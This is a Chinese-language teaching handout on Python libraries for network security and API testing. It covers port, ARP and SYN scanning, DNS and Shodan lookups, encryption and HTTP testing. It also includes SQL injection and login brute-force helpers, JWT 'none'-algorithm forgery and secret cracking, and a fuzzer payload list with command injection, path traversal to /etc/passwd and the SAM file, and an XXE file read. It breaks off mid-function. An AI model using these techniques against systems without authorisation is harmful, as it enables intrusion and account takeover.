# Python网络安全库详解课件

## 💡 Python基础知识与网络安全库的关系

### 📊 知识体系架构图

```mermaid
%%{init: {'theme':'base', 'themeVariables': { 'fontSize':'16px'}}}%%
graph TB
    subgraph base["<b>🎯 Python基础知识层</b>"]
        A1["<b>数据类型</b><br/><br/>str int list<br/>dict tuple"]
        A2["<b>控制流程</b><br/><br/>if/else<br/>for/while"]
        A3["<b>函数定义</b><br/><br/>def return<br/>参数传递"]
        A4["<b>面向对象</b><br/><br/>class self<br/>继承 方法"]
        A5["<b>异常处理</b><br/><br/>try except<br/>finally"]
    end
    
    subgraph stdlib["<b>📚 Python标准库层</b>"]
        B1["<b>socket</b><br/><br/>网络通信<br/>TCP/UDP"]
        B2["<b>hashlib</b><br/><br/>哈希函数<br/>MD5/SHA"]
        B3["<b>os/sys</b><br/><br/>系统操作<br/>文件处理"]
        B4["<b>threading</b><br/><br/>多线程<br/>并发"]
        B5["<b>json/re</b><br/><br/>数据处理<br/>正则表达式"]
    end
    
    subgraph security["<b>🔐 网络安全库层</b>"]
        C1["<b>网络编程</b><br/><br/>requests<br/>httpx"]
        C2["<b>网络扫描</b><br/><br/>nmap<br/>scapy"]
        C3["<b>加密哈希</b><br/><br/>cryptography<br/>jwt"]
        C4["<b>Web安全</b><br/><br/>BeautifulSoup<br/>Selenium"]
        C5["<b>API测试</b><br/><br/>pytest<br/>locust"]
        C6["<b>流量分析</b><br/><br/>pyshark<br/>dpkt"]
        C7["<b>渗透测试</b><br/><br/>Impacket<br/>MSF"]
    end
    
    subgraph app["<b>🚀 实战应用层</b>"]
        D1["<b>端口扫描器</b><br/>多线程扫描"]
        D2["<b>Web漏洞扫描</b><br/>SQL注入 XSS"]
        D3["<b>密码破解工具</b><br/>字典 暴力"]
        D4["<b>流量监控系统</b><br/>数据包分析"]
        D5["<b>渗透测试工具</b><br/>完整工具集"]
    end
    
    base --> stdlib
    stdlib --> security
    security --> app
    
    style base fill:#e1f5ff,stroke:#01579b,stroke-width:4px
    style stdlib fill:#f3e5f5,stroke:#4a148c,stroke-width:4px
    style security fill:#fff3e0,stroke:#e65100,stroke-width:4px
    style app fill:#e8f5e9,stroke:#1b5e20,stroke-width:4px
```

### 🎨 库的分类与依赖关系

```mermaid
mindmap
  root((Python<br/>网络安全))
    基础知识
      数据类型
      控制流程
      函数与类
      异常处理
    网络编程
      requests ⭐
        HTTP请求
        会话管理
      httpx ⭐⭐
        异步支持
        HTTP/2
      socket ⭐⭐
        TCP/UDP
        底层通信
    扫描工具
      nmap ⭐⭐
        端口扫描
        服务识别
      scapy ⭐⭐⭐
        数据包构造
        协议分析
      shodan ⭐⭐
        设备搜索
        漏洞查询
    加密安全
      hashlib ⭐
        MD5/SHA
        密码哈希
      cryptography ⭐⭐⭐
        AES/RSA
        数字签名
    Web测试
      BeautifulSoup ⭐⭐
        HTML解析
        数据提取
      Selenium ⭐⭐
        浏览器自动化
        动态测试
    API测试
      pytest ⭐⭐
        单元测试
        自动化
      locust ⭐⭐⭐
        性能测试
        压力测试
```

### 🔄 学习路径流程图

```mermaid
%%{init: {'theme':'base', 'themeVariables': { 'fontSize':'18px', 'fontFamily':'Arial'}}}%%
flowchart LR
    A["<b>Python基础</b><br/><br/>数据类型 控制流程<br/>函数 类 异常"] --> B{"<b>掌握<br/>程度?</b>"}
    B -->|"<b>熟练</b>"| C["<b>学习标准库</b><br/><br/>socket hashlib<br/>threading json"]
    B -->|"<b>不熟练</b>"| A
    
    C --> D["<b>socket</b><br/>网络编程"]
    C --> E["<b>hashlib</b><br/>加密基础"]
    C --> F["<b>threading</b><br/>多线程/异步"]
    
    D --> G["<b>requests<br/>httpx</b><br/>HTTP库"]
    E --> H["<b>cryptography</b><br/>现代加密"]
    F --> I["<b>并发扫描</b><br/>高性能"]
    
    G --> J["<b>Web安全测试</b><br/>BeautifulSoup<br/>Selenium"]
    H --> K["<b>密码学应用</b><br/>JWT AES<br/>RSA"]
    I --> L["<b>高性能工具</b><br/>nmap scapy<br/>locust"]
    
    J --> M["<b>🎯 实战项目</b>"]
    K --> M
    L --> M
    
    M --> N["<b>端口扫描器</b><br/>多线程扫描"]
    M --> O["<b>漏洞扫描器</b><br/>SQL注入 XSS"]
    M --> P["<b>渗透测试</b><br/>完整工具集"]
    
    style A fill:#4fc3f7,stroke:#01579b,stroke-width:3px,color:#000
    style C fill:#ba68c8,stroke:#4a148c,stroke-width:3px,color:#000
    style M fill:#ff9800,stroke:#e65100,stroke-width:4px,color:#000
    style N fill:#66bb6a,stroke:#1b5e20,stroke-width:3px,color:#000
    style O fill:#66bb6a,stroke:#1b5e20,stroke-width:3px,color:#000
    style P fill:#66bb6a,stroke:#1b5e20,stroke-width:3px,color:#000
    style B fill:#fff9c4,stroke:#f57f17,stroke-width:3px,color:#000
```

### 🎯 学习路径建议

#### 第一阶段：Python基础（必备）
```python
# 你需要掌握的基础知识：
✓ 变量与数据类型 (str, int, list, dict, tuple)
✓ 控制流程 (if/else, for, while)
✓ 函数定义与调用 (def, return, 参数传递)
✓ 面向对象 (class, 继承, 方法)
✓ 异常处理 (try/except/finally)
✓ 文件操作 (open, read, write)
✓ 模块导入 (import, from...import)
```

#### 第二阶段：Python标准库（重要）
```python
# 网络安全常用的标准库：
✓ socket      # 网络通信基础
✓ hashlib     # 哈希计算
✓ os/sys      # 系统操作
✓ threading   # 多线程
✓ json        # JSON处理
✓ re          # 正则表达式
✓ base64      # 编码解码
```

#### 第三阶段：网络安全库（核心）
```python
# 按难度递进学习：
1. 入门级：requests, BeautifulSoup
2. 进阶级：scapy, cryptography, pytest
3. 高级级：nmap, Selenium, locust
4. 专家级：Impacket, Metasploit API
```

### 📊 基础知识与库的依赖关系

| 网络安全库 | 依赖的Python基础知识 | 难度 |
|-----------|---------------------|------|
| **requests** | 函数调用、字典操作、异常处理 | ⭐ |
| **socket** | 网络概念、循环、字符串处理 | ⭐⭐ |
| **BeautifulSoup** | HTML知识、列表操作、循环 | ⭐⭐ |
| **hashlib** | 字符串编码、函数定义 | ⭐ |
| **scapy** | 网络协议、类与对象、位运算 | ⭐⭐⭐ |
| **cryptography** | 加密概念、字节操作、异常处理 | ⭐⭐⭐ |
| **pytest** | 函数定义、断言、装饰器 | ⭐⭐ |
| **Selenium** | 面向对象、等待机制、异常处理 | ⭐⭐ |
| **nmap** | 字典操作、循环、网络知识 | ⭐⭐ |
| **Impacket** | 网络协议、类继承、高级特性 | ⭐⭐⭐⭐ |

### 💪 为什么基础知识很重要？

```python
# 示例：没有基础知识的困境
# ❌ 不懂字典操作，无法处理HTTP响应
response = requests.get('https://api.example.com')
data = response.json()  # 返回字典，但不知道如何访问

# ✅ 有基础知识，轻松处理
response = requests.get('https://api.example.com')
data = response.json()
username = data['user']['name']  # 理解字典嵌套
for item in data['items']:        # 理解循环遍历
    print(item['title'])

# ❌ 不懂异常处理，程序容易崩溃
sock = socket.socket()
sock.connect(('192.168.1.1', 80))  # 如果连接失败，程序直接崩溃

# ✅ 有基础知识，程序更健壮
try:
    sock = socket.socket()
    sock.connect(('192.168.1.1', 80))
except socket.error as e:
    print(f"连接失败: {e}")
finally:
    sock.close()

# ❌ 不懂面向对象，无法理解库的设计
scanner = nmap.PortScanner()  # 这是什么？为什么要这样写？

# ✅ 有基础知识，理解类的实例化
class PortScanner:
    def __init__(self):
        self.results = []
    
    def scan(self, host):
        # 扫描逻辑
        pass

scanner = PortScanner()  # 创建对象实例
scanner.scan('192.168.1.1')  # 调用对象方法
```

### 🔑 关键理解

1. **基础知识是地基**：没有扎实的Python基础，学习网络安全库会非常吃力
2. **标准库是桥梁**：很多第三方库都是基于标准库构建的
3. **第三方库是工具**：它们封装了复杂的功能，但需要基础知识来驾驭
4. **实战是检验**：只有通过实际项目，才能真正掌握这些知识

---

## 1. 网络安全基础知识

### 1.1 必备概念

#### 网络协议层次
```
应用层 (HTTP, HTTPS, FTP, SSH, DNS)
传输层 (TCP, UDP)
网络层 (IP, ICMP)
数据链路层 (MAC)
物理层
```

#### 常见端口
- **21**: FTP
- **22**: SSH
- **23**: Telnet
- **25**: SMTP
- **53**: DNS
- **80**: HTTP
- **443**: HTTPS
- **3306**: MySQL
- **3389**: RDP
- **8080**: HTTP代理

#### IP地址与子网
```python
# IPv4地址格式: 192.168.1.1
# 子网掩码: 255.255.255.0 (/24)
# CIDR表示法: 192.168.1.0/24
```

#### 加密基础概念
- **对称加密**: AES, DES, 3DES (同一密钥加密解密)
- **非对称加密**: RSA, ECC (公钥加密，私钥解密)
- **哈希函数**: MD5, SHA-1, SHA-256 (单向加密)
- **编码**: Base64, URL编码, Hex编码

---

## 2. 网络编程基础库

### 2.1 socket - 底层网络通信

**功能**: Python内置的网络通信库，提供底层套接字接口

#### 基础知识点
```python
# Socket类型
SOCK_STREAM  # TCP协议 (可靠、面向连接)
SOCK_DGRAM   # UDP协议 (不可靠、无连接)
```

#### TCP服务器与客户端
```python
import socket

# TCP服务器
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(('0.0.0.0', 9999))
server.listen(5)
print("[*] 监听 0.0.0.0:9999")

while True:
    client, addr = server.accept()
    print(f"[*] 接收到来自 {addr[0]}:{addr[1]} 的连接")
    data = client.recv(1024)
    print(f"[*] 收到: {data.decode()}")
    client.send(b"ACK!")
    client.close()

# TCP客户端
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect(('192.168.1.100', 9999))
client.send(b"Hello Server!")
response = client.recv(4096)
print(response.decode())
client.close()
```

#### 端口扫描器
```python
import socket
from datetime import datetime

def scan_port(host, port):
    """扫描单个端口"""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        result = sock.connect_ex((host, port))
        sock.close()
        return result == 0
    except:
        return False

def port_scanner(host, start_port=1, end_port=1024):
    """扫描端口范围"""
    print(f"[*] 开始扫描 {host}")
    print(f"[*] 扫描时间: {datetime.now()}")
    
    open_ports = []
    for port in range(start_port, end_port + 1):
        if scan_port(host, port):
            print(f"[+] 端口 {port} 开放")
            open_ports.append(port)
    
    print(f"\n[*] 扫描完成，发现 {len(open_ports)} 个开放端口")
    return open_ports
```

---

### 2.2 requests - HTTP请求库

**功能**: 简化HTTP/HTTPS请求，是Web安全测试的基础

**安装**: `pip install requests`

#### 基础请求
```python
import requests

# GET请求
response = requests.get('https://example.com')
print(response.status_code)
print(response.text)
print(response.headers)

# POST请求
data = {'username': 'admin', 'password': '123456'}
response = requests.post('https://example.com/login', data=data)

# 带参数的GET请求
params = {'search': 'python', 'page': 1}
response = requests.get('https://example.com/api', params=params)
```

#### 高级功能
```python
# 自定义请求头
headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
    'Authorization': 'Bearer token123'
}
response = requests.get('https://example.com', headers=headers)

# 会话保持
session = requests.Session()
session.post('https://example.com/login', data={'user': 'admin'})
session.get('https://example.com/dashboard')

# 代理设置
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}
response = requests.get('https://example.com', proxies=proxies)

# SSL证书验证
response = requests.get('https://example.com', verify=False)

# 文件上传
files = {'file': open('test.txt', 'rb')}
response = requests.post('https://example.com/upload', files=files)
```

#### 安全测试应用
```python
def test_sql_injection(url):
    """SQL注入测试"""
    payloads = ["' OR '1'='1", "admin'--", "' UNION SELECT NULL--"]
    
    for payload in payloads:
        params = {'id': payload}
        response = requests.get(url, params=params)
        
        if "error" in response.text.lower() or "sql" in response.text.lower():
            print(f"[!] 可能存在SQL注入: {payload}")

def brute_force_login(url, usernames, passwords):
    """暴力破解登录"""
    for username in usernames:
        for password in passwords:
            data = {'username': username, 'password': password}
            response = requests.post(url, data=data)
            
            if "success" in response.text.lower():
                print(f"[+] 成功! {username}:{password}")
                return True
    return False
```

---

## 3. 网络扫描与信息收集

### 3.1 nmap - 网络扫描器

**功能**: Python调用Nmap进行端口扫描、服务识别、漏洞检测

**安装**: 
```bash
# 先安装nmap工具 https://nmap.org/download.html
pip install python-nmap
```

#### 详细使用
```python
import nmap

# 创建扫描器
nm = nmap.PortScanner()

# 基础扫描
nm.scan('192.168.1.1', '22-443')

# 获取扫描结果
for host in nm.all_hosts():
    print(f'主机: {host} ({nm[host].hostname()})')
    print(f'状态: {nm[host].state()}')
    
    for proto in nm[host].all_protocols():
        ports = nm[host][proto].keys()
        for port in ports:
            state = nm[host][proto][port]['state']
            print(f'端口: {port}\t状态: {state}')

# 扫描类型
nm.scan('192.168.1.0/24', arguments='-sS')      # SYN扫描
nm.scan('192.168.1.1', arguments='-sV')         # 服务版本检测
nm.scan('192.168.1.1', arguments='-O')          # 操作系统检测
nm.scan('192.168.1.1', arguments='--script vuln')  # 漏洞扫描
```

---

### 3.2 scapy - 数据包操作

**功能**: 强大的数据包构造、发送、嗅探、解析工具

**安装**: `pip install scapy`

#### 基础使用
```python
from scapy.all import *

# 构造数据包
ip = IP(dst="192.168.1.1")
tcp = TCP(dport=80, flags="S")
packet = ip/tcp

# 发送数据包
send(packet)
sr1(packet)

# 数据包嗅探
packets = sniff(count=10)
packets = sniff(filter="tcp port 80", count=5)
```

#### ARP扫描
```python
def arp_scan(ip_range):
    """ARP扫描局域网主机"""
    arp = ARP(pdst=ip_range)
    ether = Ether(dst="ff:ff:ff:ff:ff:ff")
    packet = ether/arp
    
    result = srp(packet, timeout=3, verbose=0)[0]
    
    devices = []
    for sent, received in result:
        devices.append({'ip': received.psrc, 'mac': received.hwsrc})
    
    return devices

devices = arp_scan("192.168.1.0/24")
for device in devices:
    print(f"IP: {device['ip']}\tMAC: {device['mac']}")
```

#### SYN扫描
```python
def syn_scan(target, ports):
    """SYN扫描 (半开扫描)"""
    open_ports = []
    
    for port in ports:
        pkt = IP(dst=target)/TCP(dport=port, flags="S")
        resp = sr1(pkt, timeout=1, verbose=0)
        
        if resp and resp.haslayer(TCP):
            if resp[TCP].flags == 0x12:  # SYN-ACK
                open_ports.append(port)
                rst = IP(dst=target)/TCP(dport=port, flags="R")
                send(rst, verbose=0)
    
    return open_ports
```

---

### 3.3 dnspython - DNS工具

**功能**: DNS查询、解析、区域传输测试

**安装**: `pip install dnspython`

```python
import dns.resolver

# DNS查询
def dns_lookup(domain, record_type='A'):
    """DNS查询"""
    try:
        answers = dns.resolver.resolve(domain, record_type)
        return [str(rdata) for rdata in answers]
    except Exception as e:
        return f"查询失败: {e}"

print("A记录:", dns_lookup('example.com', 'A'))
print("MX记录:", dns_lookup('example.com', 'MX'))
print("NS记录:", dns_lookup('example.com', 'NS'))

# 子域名枚举
def subdomain_enum(domain, wordlist):
    """子域名枚举"""
    found_subdomains = []
    
    for word in wordlist:
        subdomain = f"{word}.{domain}"
        try:
            answers = dns.resolver.resolve(subdomain, 'A')
            for rdata in answers:
                print(f"[+] 发现: {subdomain} -> {rdata}")
                found_subdomains.append(subdomain)
        except:
            pass
    
    return found_subdomains
```

---

### 3.4 shodan - 互联网设备搜索

**功能**: 搜索联网设备、服务、漏洞信息

**安装**: `pip install shodan`

```python
import shodan

API_KEY = "your_api_key_here"
api = shodan.Shodan(API_KEY)

# 搜索
def shodan_search(query):
    """Shodan搜索"""
    try:
        results = api.search(query)
        print(f"找到 {results['total']} 个结果")
        
        for result in results['matches']:
            print(f"IP: {result['ip_str']}")
            print(f"端口: {result['port']}")
            print(f"组织: {result.get('org', 'N/A')}")
    except shodan.APIError as e:
        print(f"错误: {e}")

# 搜索示例
shodan_search('apache')
shodan_search('port:22 country:CN')
```

---

## 4. 加密与哈希库

### 4.1 hashlib - 哈希函数

**功能**: Python内置的哈希库

```python
import hashlib

# MD5哈希
def md5_hash(text):
    return hashlib.md5(text.encode()).hexdigest()

# SHA-256哈希
def sha256_hash(text):
    return hashlib.sha256(text.encode()).hexdigest()

password = "admin123"
print(f"MD5: {md5_hash(password)}")
print(f"SHA-256: {sha256_hash(password)}")

# 文件哈希
def file_hash(filename, algorithm='sha256'):
    """计算文件哈希"""
    h = hashlib.new(algorithm)
    with open(filename, 'rb') as f:
        while chunk := f.read(8192):
            h.update(chunk)
    return h.hexdigest()

# 密码加盐哈希
def hash_password(password, salt=None):
    """密码加盐哈希"""
    if salt is None:
        import os
        salt = os.urandom(32)
    key = hashlib.pbkdf2_hmac('sha256', password.encode(), salt, 100000)
    return salt + key
```

---

### 4.2 cryptography - 现代加密库

**功能**: 提供高级加密原语

**安装**: `pip install cryptography`

```python
from cryptography.fernet import Fernet

# 对称加密
key = Fernet.generate_key()
cipher = Fernet(key)

plaintext = b"Secret Message"
ciphertext = cipher.encrypt(plaintext)
decrypted = cipher.decrypt(ciphertext)

print(f"密文: {ciphertext}")
print(f"明文: {decrypted}")
```

#### AES加密
```python
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
import os

def aes_encrypt(plaintext, key):
    """AES-256-CBC加密"""
    iv = os.urandom(16)
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    encryptor = cipher.encryptor()
    
    from cryptography.hazmat.primitives import padding
    padder = padding.PKCS7(128).padder()
    padded_data = padder.update(plaintext) + padder.finalize()
    
    ciphertext = encryptor.update(padded_data) + encryptor.finalize()
    return iv + ciphertext
```

#### RSA非对称加密
```python
from cryptography.hazmat.primitives.asymmetric import rsa, padding
from cryptography.hazmat.primitives import hashes

# 生成密钥对
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
    backend=default_backend()
)
public_key = private_key.public_key()

# 加密
message = b"Secret Message"
ciphertext = public_key.encrypt(
    message,
    padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
)

# 解密
plaintext = private_key.decrypt(
    ciphertext,
    padding.OAEP(
        mgf=padding.MGF1(algorithm=hashes.SHA256()),
        algorithm=hashes.SHA256(),
        label=None
    )
)
```

---

## 5. Web安全测试

### 5.1 BeautifulSoup - HTML解析

**功能**: 解析HTML/XML，提取数据

**安装**: `pip install beautifulsoup4 lxml`

```python
from bs4 import BeautifulSoup
import requests

html = """
<html>
    <body>
        <div class="content">
            <a href="/page1">Link 1</a>
            <a href="/page2">Link 2</a>
        </div>
        <form action="/login" method="post">
            <input type="text" name="username">
            <input type="password" name="password">
        </form>
    </body>
</html>
"""

soup = BeautifulSoup(html, 'lxml')

# 查找元素
print(soup.title.string)
print(soup.find('div', class_='content'))
print(soup.find_all('a'))

# 提取链接
links = [a['href'] for a in soup.find_all('a', href=True)]
print("链接:", links)

# 提取表单
forms = soup.find_all('form')
for form in forms:
    print(f"表单action: {form.get('action')}")
    inputs = form.find_all('input')
    for inp in inputs:
        print(f"  输入框: {inp.get('name')} ({inp.get('type')})")
```

#### 表单提取器
```python
def extract_forms(url):
    """提取页面中的所有表单"""
    response = requests.get(url)
    soup = BeautifulSoup(response.text, 'lxml')
    
    forms = []
    for form in soup.find_all('form'):
        form_details = {
            'action': form.get('action'),
            'method': form.get('method', 'get').lower(),
            'inputs': []
        }
        
        for input_tag in form.find_all('input'):
            input_details = {
                'type': input_tag.get('type', 'text'),
                'name': input_tag.get('name'),
                'value': input_tag.get('value', '')
            }
            form_details['inputs'].append(input_details)
        
        forms.append(form_details)
    
    return forms
```

---

### 5.2 Selenium - 浏览器自动化

**功能**: 自动化浏览器操作

**安装**: `pip install selenium`

```python
from selenium import webdriver
from selenium.webdriver.common.by import By
import time

# 创建浏览器实例
driver = webdriver.Chrome()

# 访问网页
driver.get("https://example.com")

# 查找元素
element = driver.find_element(By.ID, "username")
element = driver.find_element(By.NAME, "password")
element = driver.find_element(By.CLASS_NAME, "btn")

# 操作元素
element.send_keys("admin")
element.click()
element.submit()

# 截图
driver.save_screenshot("screenshot.png")

driver.quit()
```

#### 自动登录
```python
def auto_login(url, username, password):
    """自动登录"""
    driver = webdriver.Chrome()
    driver.get(url)
    
    username_field = driver.find_element(By.NAME, "username")
    username_field.send_keys(username)
    
    password_field = driver.find_element(By.NAME, "password")
    password_field.send_keys(password)
    
    login_button = driver.find_element(By.CSS_SELECTOR, "button[type='submit']")
    login_button.click()
    
    time.sleep(2)
    
    if "dashboard" in driver.current_url:
        print("[+] 登录成功")
    else:
        print("[-] 登录失败")
    
    driver.quit()
```

---

## 6. API安全测试

### 6.1 httpx - 现代HTTP客户端

**功能**: 支持HTTP/2和异步请求的现代HTTP客户端，Postman的Python替代品

**安装**: `pip install httpx`

#### 基础使用
```python
import httpx

# 同步请求
response = httpx.get('https://api.example.com/users')
print(response.status_code)
print(response.json())

# POST请求
data = {'username': 'admin', 'password': '123456'}
response = httpx.post('https://api.example.com/login', json=data)

# 自定义请求头
headers = {
    'Authorization': 'Bearer token123',
    'Content-Type': 'application/json'
}
response = httpx.get('https://api.example.com/data', headers=headers)

# 支持HTTP/2
client = httpx.Client(http2=True)
response = client.get('https://api.example.com')
client.close()
```

#### 异步请求
```python
import httpx
import asyncio

async def fetch_data():
    """异步获取数据"""
    async with httpx.AsyncClient() as client:
        response = await client.get('https://api.example.com/users')
        return response.json()

# 运行异步函数
data = asyncio.run(fetch_data())

# 并发请求
async def fetch_multiple():
    """并发获取多个API"""
    urls = [
        'https://api.example.com/users',
        'https://api.example.com/posts',
        'https://api.example.com/comments'
    ]
    
    async with httpx.AsyncClient() as client:
        tasks = [client.get(url) for url in urls]
        responses = await asyncio.gather(*tasks)
        return [r.json() for r in responses]

results = asyncio.run(fetch_multiple())
```

#### API测试示例
```python
def test_api_endpoint(base_url, endpoint):
    """测试API端点"""
    url = f"{base_url}{endpoint}"
    
    # 测试GET请求
    response = httpx.get(url)
    print(f"[*] GET {endpoint}")
    print(f"    状态码: {response.status_code}")
    print(f"    响应时间: {response.elapsed.total_seconds()}s")
    
    # 检查响应头
    print(f"    Content-Type: {response.headers.get('content-type')}")
    print(f"    Server: {response.headers.get('server')}")
    
    # 检查安全头
    security_headers = {
        'X-Frame-Options': 'SAMEORIGIN',
        'X-Content-Type-Options': 'nosniff',
        'Strict-Transport-Security': 'max-age=31536000'
    }
    
    for header, expected in security_headers.items():
        if header in response.headers:
            print(f"    [+] {header}: {response.headers[header]}")
        else:
            print(f"    [-] 缺少安全头: {header}")
    
    return response

# 使用示例
test_api_endpoint('https://api.example.com', '/users')
```

---

### 6.2 pytest - API自动化测试

**功能**: 强大的Python测试框架，适合API自动化测试

**安装**: `pip install pytest pytest-html`

#### 基础测试
```python
import pytest
import httpx

BASE_URL = "https://api.example.com"

class TestAPI:
    """API测试类"""
    
    def test_get_users(self):
        """测试获取用户列表"""
        response = httpx.get(f"{BASE_URL}/users")
        
        assert response.status_code == 200
        assert response.headers['content-type'] == 'application/json'
        
        data = response.json()
        assert isinstance(data, list)
        assert len(data) > 0
    
    def test_create_user(self):
        """测试创建用户"""
        user_data = {
            'username': 'testuser',
            'email': 'test@example.com'
        }
        
        response = httpx.post(f"{BASE_URL}/users", json=user_data)
        
        assert response.status_code == 201
        data = response.json()
        assert data['username'] == 'testuser'
    
    def test_authentication(self):
        """测试认证"""
        # 无token访问
        response = httpx.get(f"{BASE_URL}/protected")
        assert response.status_code == 401
        
        # 有token访问
        headers = {'Authorization': 'Bearer valid_token'}
        response = httpx.get(f"{BASE_URL}/protected", headers=headers)
        assert response.status_code == 200

# 运行测试: pytest test_api.py -v
```

#### 参数化测试
```python
import pytest

@pytest.mark.parametrize("endpoint,expected_status", [
    ("/users", 200),
    ("/posts", 200),
    ("/invalid", 404),
])
def test_endpoints(endpoint, expected_status):
    """参数化测试多个端点"""
    response = httpx.get(f"{BASE_URL}{endpoint}")
    assert response.status_code == expected_status

@pytest.mark.parametrize("payload", [
    "' OR '1'='1",
    "<script>alert('XSS')</script>",
    "../../../etc/passwd",
])
def test_input_validation(payload):
    """测试输入验证"""
    response = httpx.post(
        f"{BASE_URL}/search",
        json={'query': payload}
    )
    
    # 应该返回400或过滤恶意输入
    assert response.status_code in [400, 200]
    
    if response.status_code == 200:
        # 确保payload被过滤
        assert payload not in response.text
```

#### Fixtures和配置
```python
import pytest

@pytest.fixture
def api_client():
    """创建API客户端fixture"""
    client = httpx.Client(base_url=BASE_URL)
    yield client
    client.close()

@pytest.fixture
def auth_token():
    """获取认证token"""
    response = httpx.post(
        f"{BASE_URL}/login",
        json={'username': 'admin', 'password': 'admin123'}
    )
    return response.json()['token']

def test_with_fixtures(api_client, auth_token):
    """使用fixtures的测试"""
    headers = {'Authorization': f'Bearer {auth_token}'}
    response = api_client.get('/protected', headers=headers)
    assert response.status_code == 200
```

---

### 6.3 tavern - API测试框架

**功能**: 基于YAML的API测试框架，适合RESTful API测试

**安装**: `pip install tavern`

#### YAML测试文件
```yaml
# test_api.tavern.yaml
test_name: 测试用户API

stages:
  - name: 获取用户列表
    request:
      url: https://api.example.com/users
      method: GET
    response:
      status_code: 200
      headers:
        content-type: application/json
      json:
        - username: !anystr
          email: !anystr

  - name: 创建新用户
    request:
      url: https://api.example.com/users
      method: POST
      json:
        username: testuser
        email: test@example.com
    response:
      status_code: 201
      json:
        username: testuser
        id: !anyint
      save:
        json:
          user_id: id

  - name: 获取创建的用户
    request:
      url: https://api.example.com/users/{user_id}
      method: GET
    response:
      status_code: 200
      json:
        username: testuser
```

#### Python代码调用
```python
from tavern.core import run

# 运行测试
run('test_api.tavern.yaml')
```

---

### 6.4 locust - API性能测试

**功能**: 分布式负载测试工具，测试API性能和压力

**安装**: `pip install locust`

#### 基础负载测试
```python
from locust import HttpUser, task, between

class APIUser(HttpUser):
    """API用户行为模拟"""
    
    wait_time = between(1, 3)  # 请求间隔1-3秒
    host = "https://api.example.com"
    
    def on_start(self):
        """初始化，登录获取token"""
        response = self.client.post("/login", json={
            'username': 'testuser',
            'password': 'password123'
        })
        self.token = response.json()['token']
    
    @task(3)  # 权重3
    def get_users(self):
        """获取用户列表"""
        headers = {'Authorization': f'Bearer {self.token}'}
        self.client.get("/users", headers=headers)
    
    @task(2)  # 权重2
    def get_posts(self):
        """获取文章列表"""
        headers = {'Authorization': f'Bearer {self.token}'}
        self.client.get("/posts", headers=headers)
    
    @task(1)  # 权重1
    def create_post(self):
        """创建文章"""
        headers = {'Authorization': f'Bearer {self.token}'}
        self.client.post("/posts", headers=headers, json={
            'title': 'Test Post',
            'content': 'This is a test post'
        })

# 运行: locust -f locustfile.py
# 访问 http://localhost:8089 设置用户数和启动速率
```

#### 高级场景
```python
from locust import HttpUser, task, between, SequentialTaskSet

class UserBehavior(SequentialTaskSet):
    """顺序执行的任务集"""
    
    @task
    def login(self):
        """步骤1: 登录"""
        response = self.client.post("/login", json={
            'username': 'user',
            'password': 'pass'
        })
        self.user.token = response.json()['token']
    
    @task
    def browse_products(self):
        """步骤2: 浏览商品"""
        headers = {'Authorization': f'Bearer {self.user.token}'}
        self.client.get("/products", headers=headers)
    
    @task
    def add_to_cart(self):
        """步骤3: 添加到购物车"""
        headers = {'Authorization': f'Bearer {self.user.token}'}
        self.client.post("/cart", headers=headers, json={
            'product_id': 123,
            'quantity': 1
        })
    
    @task
    def checkout(self):
        """步骤4: 结账"""
        headers = {'Authorization': f'Bearer {self.user.token}'}
        self.client.post("/checkout", headers=headers)

class WebsiteUser(HttpUser):
    tasks = [UserBehavior]
    wait_time = between(1, 5)
    host = "https://api.example.com"
```

---

### 6.5 API安全测试工具

#### 6.5.1 JWT安全测试
```python
import jwt
import base64
import json

def test_jwt_security(token):
    """测试JWT安全性"""
    print("[*] 分析JWT Token")
    
    # 解码JWT (不验证签名)
    try:
        header = jwt.get_unverified_header(token)
        payload = jwt.decode(token, options={"verify_signature": False})
        
        print(f"[*] Header: {header}")
        print(f"[*] Payload: {payload}")
        
        # 检查算法
        if header.get('alg') == 'none':
            print("[!] 警告: 使用了'none'算法，存在安全风险")
        
        # 检查过期时间
        if 'exp' not in payload:
            print("[!] 警告: Token没有过期时间")
        
        # 尝试修改payload
        modified_payload = payload.copy()
        modified_payload['role'] = 'admin'
        
        # 尝试使用none算法
        none_token = jwt.encode(modified_payload, '', algorithm='none')
        print(f"[*] None算法Token: {none_token}")
        
    except Exception as e:
        print(f"[-] 解码失败: {e}")

def brute_force_jwt_secret(token, wordlist):
    """暴力破解JWT密钥"""
    print("[*] 开始暴力破解JWT密钥")
    
    for secret in wordlist:
        try:
            decoded = jwt.decode(token, secret, algorithms=['HS256'])
            print(f"[+] 找到密钥: {secret}")
            return secret
        except:
            pass
    
    print("[-] 破解失败")
    return None

# 使用示例
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9..."
test_jwt_security(token)

common_secrets = ['secret', 'password', '123456', 'key']
brute_force_jwt_secret(token, common_secrets)
```

#### 6.5.2 API模糊测试
```python
import httpx
import random
import string

class APIFuzzer:
    """API模糊测试器"""
    
    def __init__(self, base_url):
        self.base_url = base_url
        self.client = httpx.Client()
    
    def generate_payloads(self):
        """生成测试payload"""
        return [
            # SQL注入
            "' OR '1'='1",
            "'; DROP TABLE users--",
            "1' UNION SELECT NULL--",
            
            # XSS
            "<script>alert('XSS')</script>",
            "<img src=x onerror=alert('XSS')>",
            
            # 命令注入
            "; ls -la",
            "| cat /etc/passwd",
            "&& whoami",
            
            # 路径遍历
            "../../../etc/passwd",
            "..\\..\\..\\windows\\system32\\config\\sam",
            
            # 超长字符串
            "A" * 10000,
            
            # 特殊字符
            "!@#$%^&*()",
            "\x00\x01\x02",
            
            # JSON注入
            '{"admin": true}',
            '{"$ne": null}',
            
            # XXE
            '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>',
        ]
    
    def fuzz_endpoint(self, endpoint, method='GET'):
        """模糊测试端点"""
        print(f"[*] 模糊测试: {method} {endpoint}")
        
